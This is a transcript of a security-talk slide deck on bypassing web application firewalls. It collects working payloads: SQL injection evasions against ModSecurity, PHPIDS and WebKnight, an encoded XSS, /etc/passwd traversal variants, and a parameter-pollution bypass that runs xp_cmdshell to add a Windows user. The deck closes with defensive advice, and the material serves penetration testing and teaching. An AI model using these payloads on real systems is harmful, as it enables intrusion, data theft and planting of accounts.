Web Application Firewall: Suckseed or Succeed
-
Upload
prathan-phongthiproek -
Category
Documents
-
view
7.341 -
download
5
description
Transcript of Web Application Firewall: Suckseed or Succeed
![Page 1: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/1.jpg)
Web Application Firewall (WAF)Suckseed or Succeed !?
Mr.Prathan Phongthiproek Consulting Manager, Red TeamACIS Professional Center
![Page 2: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/2.jpg)
Who am I ?
ACIS Professional Center
Manager of the Red Team
Specializing in Attack & Penetration
Information Security Consulting Manager
Instructor and Speaker
Founder of CWH Underground Hacker
Aka 0x7a657133756c
![Page 3: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/3.jpg)
Let’s RevealIntroduction to Web Application Firewall (WAF)
Breach it !! Filter Evasion
HTTP Parameter Contamination
HTTP Pollution: Split and Join
Conclusion
![Page 4: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/4.jpg)
Introduction to Web Application Firewall (WAF)
![Page 5: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/5.jpg)
Web Application Hacking
7 of 10 sites are vulnerable
70% of Cyber attacks are on web ports
95% of companies are hacked through web ports
Anonymous and Lulzsec
Hacker with Operation
#AntiSec
![Page 6: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/6.jpg)
Web Application Hacking
Top 3 Web App AttacksCross Site Scripting
File Inclusion (Remote/Local)
SQL Injection (Normal/Blind/Time based/Regex...)
![Page 7: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/7.jpg)
Misunderstand for Harden Web Application
![Page 8: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/8.jpg)
What’s WAF ?
Emerged from IDS/IPS focused on HTTP protocol and HTTP related attacks
Usually contain a lot of complex
reg-exp rules to match (Blacklist)
For most WAF vendors they are “Closely guarded secrets”
Open-source WAFs (Mod_security and PHPIDS) have open source rules
![Page 9: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/9.jpg)
Understand Blacklist
![Page 10: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/10.jpg)
Detection and ProtectionSQL Injection
Cross Site Scripting
Local and Remote File Inclusion
Code/Command Injection
Directory Traversal
Buffer Overflow
Cookie Poisoning
Parameter Tampering
Upload File Mis-Handling
Information Disclosure
Etc...
![Page 11: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/11.jpg)
WAFs VendorsArmorize
Barracuda
Cisco ACE
Citrix Netscaler
F5
Imperva SecureSphere
Radware Appwall
Profense
Bee-ware
BinarySec
Mod Security
WebKnight
DenyAll
Fortify
Visonys
Pentasecurity
Other..
![Page 12: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/12.jpg)
WAF implementation
![Page 13: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/13.jpg)
Breach it !! (CMS and WAFs)“เอาอยู ่เอาอยู.่......แตกแล้ว”
![Page 14: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/14.jpg)
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
‘ “ -> \’ \”
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’
![Page 15: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/15.jpg)
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
‘ “ -> \’ \”
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
![Page 16: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/16.jpg)
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
String to ASCII
id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
![Page 17: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/17.jpg)
Filter Evasion (SQLi)
Comments //,--,/**/,/*,#,%00
id=1+un/**/ion+se/**/lect+1,2,3--
Case Changing (lower case)
/union\sselect/gid=1+UnIoN/**/SeLecT/**/1,2,3--
Replaced keywordsid=1+UnunionIoN+SeselectLecT+1,2,3--
![Page 18: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/18.jpg)
Filter Evasion (SQLi)
Case Study: NukeSentinel (PHP Nuke)Encode to Hex
Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......
Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......
Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
![Page 19: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/19.jpg)
Filter Evasion (SQLi)Buffer Overflow (For C language)
id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--
![Page 20: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/20.jpg)
Filter Evasion (SQLi)
Inline Comments (/*!......*/)A lot of WAFs was bypassed
Bypass IPS and Timeout
MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)
/union\sselect/ig
id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
![Page 21: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/21.jpg)
Filter Evasion (SQLi)
Inline Comments (/*!......*/)
![Page 22: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/22.jpg)
Filter Evasion (SQLi)
Censor
![Page 23: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/23.jpg)
Filter Evasion (SQLi)
Other Bypasses: and -> &&
or -> ||
= -> like
substring() -> substr(), mid(), strcmp()
ascii() -> hex(), bin(), char(), ord()
benchmark() -> sleep()
Whitespace -> (),/**/,%0b
isnull, between
![Page 24: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/24.jpg)
Filter Evasion (SQLi)
Case Study: PHPIDS
![Page 25: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/25.jpg)
Filter Evasion (SQLi)
Case Study: PHPIDS
![Page 26: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/26.jpg)
Filter Evasion (SQLi)
Case Study: PHPIDS
![Page 27: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/27.jpg)
Filter Evasion (SQLi)
Case Study: Mod Security CRS
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \
"phase2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
![Page 28: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/28.jpg)
Filter Evasion (SQLi)
Case Study: Mod Security CRShttp://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*barselect#foo1,2,current_user
0 div 1 union select 1,2,current_user
![Page 29: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/29.jpg)
Filter Evasion
Cross Site Scripting (XSS)Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')
Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
File InclusionForbidden: http://victim.com/download.php?file=../../../etc/passwd
Bypass: http://victim.com/download.php?file=../../../etc/passwd..........
Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
![Page 30: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/30.jpg)
HTTP Parameter Contamination
![Page 31: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/31.jpg)
HTTP Parameter Contamination
Bypass Mod_Security SQLi rule (modsecurity_crs_41)
Bypass URLScan 3.1 DenyQueryStringSequences rules
Bypass AQTRONIX Webknight WAF with “%”
![Page 32: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/32.jpg)
HTTP Parameter Contamination
Case Study: AQTRONIX Webknighthttp://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 and 1=0/(select top 1 table_name from information_schema.tables)
![Page 33: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/33.jpg)
HTTP Pollution: Split and Join
HPP is a quite simple but effective hacking technique
HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string
Focus on ASP/ASP.net
A lot of WAF was bypassed
![Page 34: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/34.jpg)
HTTP Pollution: Split and Join
![Page 35: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/35.jpg)
HTTP Pollution: Split and Join
![Page 36: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/36.jpg)
HTTP Pollution: Split and Join
![Page 37: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/37.jpg)
HTTP Pollution: Split and Join
Basic Attack
Forbidden:http://victim.com/search.aspx?q=select name,password from user
Bypass:http://victim.com/search.aspx?q=select name&q=password from user
q=select nameq=password from user
q=select name,password from user
![Page 38: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/38.jpg)
HTTP Pollution: Split and Join
HPP+Inline Comment (Bypass Commercial WAF)
Forbidden:http://victim.com/search.aspx?q=select name,password from user
Bypass:http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user
q=select/*q=*/nameq=password/*q=*/from/*q=*/user
q=select/*,*/name,password/*,*/from/*,*/userq=select name,password from user
![Page 39: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/39.jpg)
HTTP Pollution: Split and Join
![Page 40: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/40.jpg)
HTTP Pollution: Split and JoinCase study: IBM Web Application Firewall (2011-6-21)
Forbidden:http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” --
Bypass:http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --
id=1’; /*id=1*/ EXEC /*id=1*/ master..xp_cmdshell /*id=1*/ “net user lucifer UrWaFisShiT” /*id=1*/ --
id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ --id=1’; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --
![Page 41: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/41.jpg)
“ประเทศไทยต้องการ ความเปลี่ยนแปลง ถึงเวลาที่ทุกคนในประเทศตื่นตัวได้แล้ว ความโง่เขลาจักต้องหมดสิ้นไป”
![Page 42: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/42.jpg)
How to protect your website ?
Implement Secure Software Development Life Cycle (SSDLC)
Secure Coding: Validate all inputs and outputs
Pentest before Online
Harden it !!
Re-visit Again
Deploy WAF (Optional)
![Page 43: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/43.jpg)
ConclusionWAF is not the long-expected
It’s functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
It’s necessary to adapt WAF filter to the particular web app being protected
WAF doesn’t eliminate a vulnerability, It just partly screens the attack vector
It suckseed or succeed !?
“Security Products not able to 100% protect from damn config/coding of admin. Just need a time and imagination for breach it !!”
![Page 44: Web Application Firewall: Suckseed or Succeed](https://reader031.fdocuments.us/reader031/viewer/2022012403/554a18cab4c9055c598b5234/html5/thumbnails/44.jpg)
Greetz To..
ACIS-Red Team
Kyle
Johannes Dahse
Ahmad Maulana
Luca Carettoni
Stefano di Paola
Ivan Markovic
All WAF products that I breached